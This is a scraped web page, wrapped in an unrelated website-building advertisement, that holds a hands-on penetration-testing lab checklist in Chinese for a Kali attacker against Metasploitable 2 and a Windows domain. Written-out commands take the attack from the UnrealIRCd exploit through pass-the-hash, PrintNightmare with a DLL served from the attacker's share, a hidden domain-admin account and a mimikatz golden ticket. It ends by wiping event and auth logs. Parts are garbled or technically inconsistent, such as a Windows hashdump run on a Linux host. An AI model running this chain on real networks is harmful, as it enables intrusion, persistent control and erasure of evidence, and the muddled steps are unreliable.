建大仁科公司网站电商平台网站技术开发
2026/4/16 11:27:48 网站建设 项目流程
建大仁科公司网站,电商平台网站技术开发,wordpress产品详情相册,四川做网站的公司哪家好本清单以 “外网突破→内网信息收集→横向移动→权限提升→持久化” 为核心流程#xff0c;使用 Kali Linux 作为攻击机#xff0c;Metasploitable 2#xff08;Linux 靶机#xff09; Vulhub Windows 域环境靶机作为目标#xff0c;全程手把手指导。 一、 靶场环境搭建 …本清单以“外网突破→内网信息收集→横向移动→权限提升→持久化”为核心流程使用 Kali Linux 作为攻击机Metasploitable 2Linux 靶机 Vulhub Windows 域环境靶机作为目标全程手把手指导。一、 靶场环境搭建1. 基础环境准备设备系统版本IP 规划建议同一内网段核心作用攻击机Kali Linux 2025192.168.56.101执行扫描、漏洞利用、横向移动外网跳板机Metasploitable 2192.168.56.102模拟外网 Web 服务器作为内网入口内网域靶机Windows Server 2019AD192.168.56.103域控制器DC域名为test.com内网普通主机Windows 10192.168.56.104域内普通主机加入test.com域2. 环境配置步骤虚拟机网络设置所有设备均设置为Host-Only 模式确保处于同一内网段且攻击机能访问所有靶机。Metasploitable 2 部署下载镜像Metasploitable 2 官方镜像虚拟机导入后默认账户密码msfadmin/msfadminWindows 域环境部署Vulhub 快捷方式克隆 Vulhub 仓库git clone https://github.com/vulhub/vulhub.git进入 Windows 域环境目录如vulhub/windows/ad启动靶机docker-compose up -d注意Vulhub 域靶机默认开启 WinRM、SMB 服务方便后续渗透。二、 实操步骤完整流程阶段 1外网突破 - 获取跳板机Metasploitable 2权限端口扫描与漏洞发现攻击机执行 nmap 扫描nmap -sV -p- 192.168.56.102发现开放端口21FTP、22SSH、80HTTP、3306MySQL等且存在UnrealIRCd 后门漏洞经典漏洞。漏洞利用 - 获取 Meterpreter 会话启动 msfconsolemsfconsole搜索漏洞模块search unrealircd加载模块use exploit/unix/irc/unrealircd_3281_backdoor设置目标 IPset RHOSTS 192.168.56.102执行攻击run成功获取meterpreter 会话当前权限为msfadmin。阶段 2内网信息收集从跳板机探测内网跳板机内网网段探测在 meterpreter 中执行ipconfig发现跳板机内网网卡 IP 为192.168.56.102推测内网段为192.168.56.0/24。执行内网存活主机扫描run post/multi/gather/ping_sweep RHOSTS192.168.56.0/24发现存活主机192.168.56.103DC、192.168.56.104Windows 10。端口与服务探测对 DC 进行端口扫描run auxiliary/scanner/portscan/tcp RHOSTS192.168.56.103 PORTS135,139,445,389发现 DC 开放 445SMB、389LDAP端口确认是域控制器。域环境信息收集切换到跳板机 shellshell安装 impacket 工具Kali 已预装执行域用户查询bash运行python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103成功获取域用户列表administrator、user1等。阶段 3横向移动 - 从跳板机到内网 Windows 10 主机凭证获取跳板机本地哈希提取回到 meterpreter 会话执行哈希提取run post/windows/gather/hashdump若跳板机是 Linux改用linpeas.sh提取凭证bash运行wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod x linpeas.sh ./linpeas.sh假设获取到域用户user1的 NTLM 哈希aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef哈希传递攻击PTH使用 impacket 的 psexec.py 执行横向移动bash运行python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef成功获取 Windows 10 主机的system 权限 shell。阶段 4权限提升 - 从域用户到域管理员域内信息收集Windows 10 主机在 shell 中执行域管理员查询net group Domain Admins /domain发现域管理员账户administrator。利用 PrintNightmare 漏洞提权假设 DC 未打补丁攻击机下载 PrintNightmare 利用脚本git clone https://github.com/cube0x0/CVE-2021-34527.git编译脚本后通过 smb 共享传输到 Windows 10 主机bash运行impacket-smbserver share . -smb2supportWindows 10 主机挂载共享net use \\192.168.56.101\share执行提权脚本CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll成功获取域管理员权限。阶段 5持久化 - 域内留后门创建隐藏域管理员账户在 DC 中执行命令cmdnet user hidden_admin Pssw0rd! /add /domain net group Domain Admins hidden_admin /add /domain黄金票据生成使用 mimikatz 提取域控制器的 KRBTGT 账户哈希bash运行mimikatz.exe lsadump::lsa /inject /name:krbtgt exit生成黄金票据bash运行mimikatz.exe kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt exit利用黄金票据可长期控制整个域无需再次破解密码。阶段 6痕迹清理Windows 日志清理执行命令删除事件日志cmdwevtutil cl System wevtutil cl Security wevtutil cl ApplicationLinux 日志清理清空跳板机日志bash运行echo /var/log/auth.log echo /var/log/syslog history -c history -w三、 靶场实操注意事项环境隔离所有操作必须在独立虚拟机环境中进行禁止接入公网。工具版本确保 Kali 工具为最新版执行apt update apt upgrade升级。权限授权本清单仅用于合法渗透测试学习必须获得靶机授权。排错技巧若攻击失败优先检查网络连通性、靶机补丁状态、工具参数是否正确。

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询